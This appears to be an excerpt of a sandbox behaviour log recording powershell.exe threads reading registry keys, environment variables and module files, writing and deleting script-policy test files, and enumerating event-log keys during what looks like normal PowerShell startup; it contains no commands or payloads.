File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = TZI, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Display, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Display, data = @tzres.dll,-320, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Std, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Std, data = @tzres.dll,-322, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Dlt, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Dlt, data = @tzres.dll,-321, type = REG_SZ True 1
Fn
Module Load module_name = C:\WINDOWS\system32\en-US\tzres.dll.mui, base_address = 0x2477cbe0001 True 3
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
File Create Pipe pipe_name = \device\namedpipe\pshost.131687220369232747.4512.defaultappdomain.powershell, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_FIRST_PIPE_INSTANCE, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 True 1
Fn
File Get Info type = file_type True 1
Fn
Environment Get Environment String name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Set Environment String name = PathEXT, value = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 1
Fn
Environment Get Environment String name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Environment True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Set Environment String name = PSMODULEPATH, value = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 4
Fn
File Get Info filename = C:\Users\FD1HVy\Documents, type = file_attributes True 1
Fn
File Get Info filename = C:\Users, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\FD1HVy, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\FD1HVy\Documents, type = file_attributes True 3
Fn
Environment Get Environment String name = USERPROFILE, result_out = C:\Users\FD1HVy True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\Users\FD1HVy\Documents, type = file_attributes True 1
Fn
File Get Info filename = C:\Users, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\FD1HVy, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\FD1HVy\Documents, type = file_attributes True 3
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Winevt\Publishers\{816ebd75-f7ab-59c0-e2f0-bddfeed66ac2} False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
System Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 1
Fn
File Get Info filename = C:\WINDOWS\system32\wldp.dll, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\, type = file_attributes True 1
Fn
File Create filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1, type = file_type True 2
Fn
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1, size = 1 True 1
Fn
Data
File Create filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1, type = file_type True 2
Fn
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1, size = 1 True 1
Fn
Data
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1, type = file_attributes True 1
Fn
File Delete filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1 True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1, type = file_attributes True 1
Fn
File Delete filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\FD1HVy\Documents\WindowsPowerShell\profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\FD1HVy\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Thread 0x135c
2 5
»
Category Operation Information Success Count Logfile
Module Unmap process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Thread 0x1118
80 0
»
Category Operation Information Success Count Logfile
File Get Info filename = C:\WINDOWS\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN, value_name = ServiceStackVersion, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN, value_name = ServiceStackVersion, data = 3.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes True 1
Fn
File Create filename = C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Module Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 23
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 101
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Thread 0xc24
180 0
»
Category Operation Information Success Count Logfile
System Sleep duration = 0 milliseconds (0.000 seconds) True 9
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 26
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 52
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\VpnClient\VpnClient.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MsDtc\MsDtc.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule\TrustedPlatformModule.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Provisioning\Provisioning.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BranchCache\BranchCache.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch\WindowsSearch.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Kds\Kds.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice\PcsvDevice.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\UEV\UEV.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\StartLayout\StartLayout.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psm1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetAdapter\NetAdapter.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbWitness\SmbWitness.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Storage\Storage.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SecureBoot\SecureBoot.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psm1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TLS\TLS.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PnpDevice\PnpDevice.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psm1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DnsClient\DnsClient.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppvClient\AppvClient.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PrintManagement\PrintManagement.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadLine.psm1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadline.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense\WindowsDeveloperLicense.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MMAgent\MMAgent.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSecurity\NetSecurity.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Wdac\Wdac.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus\NetworkConnectivityStatus.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\International\International.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition\NetworkTransition.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate\WindowsUpdate.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DeliveryOptimization\DeliveryOptimization.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ConfigCI\ConfigCI.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadLine.psm1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetConnection\NetConnection.psd1, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP\NetTCPIP.psd1, type = file_attributes True 1
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 50
Fn
Thread 0xc04
155 0
»
Category Operation Information Success Count Logfile
System Sleep duration = 0 milliseconds (0.000 seconds) True 17
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
